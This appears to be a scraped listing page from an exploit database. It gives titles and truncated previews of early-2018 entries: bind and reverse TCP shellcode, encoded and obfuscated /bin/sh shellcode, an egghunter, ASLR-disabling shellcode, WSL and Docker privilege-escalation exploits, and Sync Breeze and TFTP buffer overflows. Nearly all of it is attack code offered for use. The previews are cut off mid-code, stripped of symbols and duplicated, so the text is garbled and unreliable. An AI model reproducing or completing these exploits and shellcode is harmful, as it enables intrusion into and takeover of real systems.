Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode

/----- Crypter.c ----- / / Optimized Twofish C implementation by Drew Csillag: https://www.schneier.com/code/twofish-cpy.zip Partially re-written by Andre Lima https://andrelima.info to encrypt/decrypt variable length Linux x8664 shellcode. compiler is gccegcs-2.91.66 flags are -O3...

Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)

global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; copy socket descriptor to rdi for future use xchg rdi,rax ; server.sinfamily = AFINET ; server.sinport = htonsPORT ;...

Microsoft Windows Subsystem for Linux - execve() Local Privilege Escalation Exploit

Exploit for windows platform in category local exploits define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x18 define LEAKOFFS...

Microsoft Windows Subsystem for Linux - execve() Local Privilege Escalation

Microsoft Windows Subsystem for Linux - execve Local Privilege Escalation define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x...

Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode

Linux/x64 - Twofish Encoded + DNS CNAME Password + execve/bin/sh Shellcode. Shellcode exploit for Linuxx86-64 platform /----- Crypter.c ----- / / Optimized Twofish C implementation by Drew Csillag: https://www.schneier.com/code/twofish-cpy.zip Partially re-written by Andre Lima...

Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation

define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x18 define LEAKOFFSET 0x68 define SHELLCODEOFFSET 0x200 define...

Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH) Exploit

Exploit for windows platform in category remote exploits Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Exploit Author: Daniel Teixeira Vendor Homepage: http://www.syncbreeze.com Software Link:...

Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)

Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Date: 29/01/2018 Exploit Author: Daniel Teixeira Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.4.18.exe Version: 10.4.18 Tested on:...

LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow Exploit

Exploit for windows platform in category dos / poc !/usr/bin/python Exploit Author: Miguel Mendez Z Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow Date: 29-01-2018 Software: LabF nfsAxe Version: v3.7 Vendor Homepage: http://www.labf.com Software Link:...

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) Null Free Shellcode (80 bytes)

/ Title: Linux/ARM - Reverse Shell TCP /bin/sh. Null free shellcode 80 bytes Date: 2018-01-25 Tested: armv7l Raspberry Pi v3 Author: rtmcx - twitter: @rtmcx / .section .text .global start start: / Enter Thumb mode / .ARM add r3, pc, 1 bx r3 .THUMB / Create a new socket/ mov r0, 2 // PFINET = 2 mo...

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)

Linux/ARM - Reverse TCP 192.168.1.1:4444/TCP Shell /bin/sh+ Null-Free Shellcode 80 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Reverse Shell TCP /bin/sh. Null free shellcode 80 bytes Date: 2018-01-25 Tested: armv7l Raspberry Pi v3 Author: rtmcx - twitter: @rtmcx / .section .tex...

Linux/x86 - Egghunter Shellcode (12 Bytes)

Linux/x86 - Egghunter Shellcode 12 Bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable...

Linux/x86 - Egghunter Shellcode (12 Bytes)

/ Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable EGG 2. Make sure you clear EDX, EAX registers in the shellcode before any other...

Threat Analysis: Pylot (Travle) Malware Family

The Pylot or Travle malware family appears to be an evolution of the NetTravler malware family which has been linked to attackers out of China by numerous sources. Over the last year a variant has been observed as a secondary payload often used in conjunction with malicious carrier files typicall...

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)

;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp zero2 zero18: mov al,0x4 jmp zero19 zero1a: mov al,0x6 jmp zero1b zeroc: push 0x72702f2f jmp zerod zero12:...

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode 23 bytes. Shellcode exploit for Linuxx86 platform ;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp...

Linux/x86 ROT-N + Shift-N + XOR-N Encoded /bin/sh Shellcode (77 bytes)

/ Description ; Title : ROT-N + Shift-N + XOR-N encoded /bin/sh - Shellcode ; Author : Hashim Jawad ; Blog Post : https://ihack4falafel.com/2018/01/rot-n-shift-n-xor-n-shellcode-encoder-linux-x86/ ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; Tested On : Ubunt...

Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)

Linux/x86 - execve/bin/sh + ROT-N + Shift-N + XOR-N Encoded Shellcode 77 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : ROT-N + Shift-N + XOR-N encoded /bin/sh - Shellcode ; Author : Hashim Jawad ; Blog Post :...

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free She

/ Title: Linux/ARM - Password Protected Reverse Shell TCP /bin/sh. Null free shellcode 156 bytes Date: 2018-01-15 Tested: armv7l Raspberry Pi v3 Author: rtmcx - twitter: @rtmcx / .section .text .global start start: / Enter Thumb mode / .ARM add r6, pc, 1 bx r6 .THUMB / Create a new socket/ /...

Docker Sudo Privilege Escalation

!/bin/bash SUDO Docker Privilege Escalation https://github.com/pyperanger/dockerevil SELINUX "bypass" using :z option https://docs.docker.com/engine/admin/volumes/bind-mounts/configure-the-selinux-label echo " SUDO Docker Privilege Escalation"; echo "+ Writing shellcode"; cat /tmp/sud0-d0ck3r.c...